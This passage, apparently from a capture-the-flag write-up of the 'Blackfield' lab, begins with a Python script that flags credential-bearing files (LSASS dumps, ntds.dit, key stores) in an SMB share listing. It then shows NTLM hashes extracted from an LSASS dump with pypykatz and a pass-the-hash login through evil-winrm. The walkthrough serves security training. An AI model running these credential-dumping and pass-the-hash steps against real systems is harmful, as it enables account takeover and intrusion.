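    r"(?P<date>[A-Z][a-z]{2} [A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2} \d{4})$"
)

# (pattern on the file name, why it matters to a defender)
SENSITIVE = [
    (re.compile(r"lsass", re.I), "LSASS dump: holds cached logon credentials"),
    (re.compile(r"\.dmp$", re.I), "process memory dump"),
    (re.compile(r"ntds\.dit$", re.I), "copy of the AD database"),
    (re.compile(r"domain_admins", re.I), "privileged-group export"),
    (re.compile(r"\.(kdbx|pfx|p12|pem|key)$", re.I), "key or password store"),
]


def parse_listing(text: str) -> List[Tuple[str, int, bool]]:
    """(full path, size, is_dir) per entry; '.', '..' and the free-space line are dropped."""
    cwd = "\\"
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("smb:") or "blocks of size" in line:
            continue
        m = ENTRY.match(line)
        if m is None:
            if line.startswith("\\"):  # directory header emitted in recurse mode
                cwd = line.rstrip("\\") + "\\"
            continue
        if m["name"] in (".", ".."):
            continue
        entries.append((cwd + m["name"], int(m["size"]), "D" in m["attrs"]))
    return entries


def flag_sensitive(entries: List[Tuple[str, int, bool]]) -> List[Tuple[str, str]]:
    """(path, reason) for every file whose name matches a SENSITIVE pattern."""
    hits = []
    for path, _size, is_dir in entries:
        if is_dir:
            continue
        name = path.rsplit("\\", 1)[-1]
        for pattern, why in SENSITIVE:
            if pattern.search(name):
                hits.append((path, why))
                break
    return hits


# Entries copied from the listing above; the memory_analysis block and its size are constructed.
SAMPLE_LISTING = r"""
. D 0 Sun Feb 23 17:03:16 2020
.. D 0 Sun Feb 23 17:03:16 2020
commands_output D 0 Sun Feb 23 22:14:37 2020
memory_analysis D 0 Fri May 29 00:28:33 2020
tools D 0 Sun Feb 23 17:39:08 2020
\commands_output
. D 0 Sun Feb 23 22:14:37 2020
.. D 0 Sun Feb 23 22:14:37 2020
domain_admins.txt A 528 Sun Feb 23 17:00:19 2020
domain_groups.txt A 962 Sun Feb 23 16:51:52 2020
netstat.txt A 3842 Sun Feb 23 16:51:01 2020
\memory_analysis
. D 0 Fri May 29 00:28:33 2020
.. D 0 Fri May 29 00:28:33 2020
lsass.zip A 41943040 Fri May 29 00:28:33 2020
5102079 blocks of size 4096. 1671250 blocks available
"""

if __name__ == "__main__":
    for path, why in flag_sensitive(parse_listing(SAMPLE_LISTING)):
        print(f"{path}: {why}")
```

Run this over a listing taken with a low-privilege domain account to see what such an account can reach. Incident artefacts like memory dumps belong in a location restricted to the responders handling the case, not on a share every user can read.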
2.5. Analyzing the lsass.dmp file
Analyzing this file, the NTLM hashes of various accounts can be extracted.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
[...SNIP...]
Taking that hash and logging in as svc_backup with it gave a working shell, and the user.txt file could be read.
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type C:\Users\svc_backup\Desktop\user.txt
A login attempt as administrator was made the same way, but it did not succeed.
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1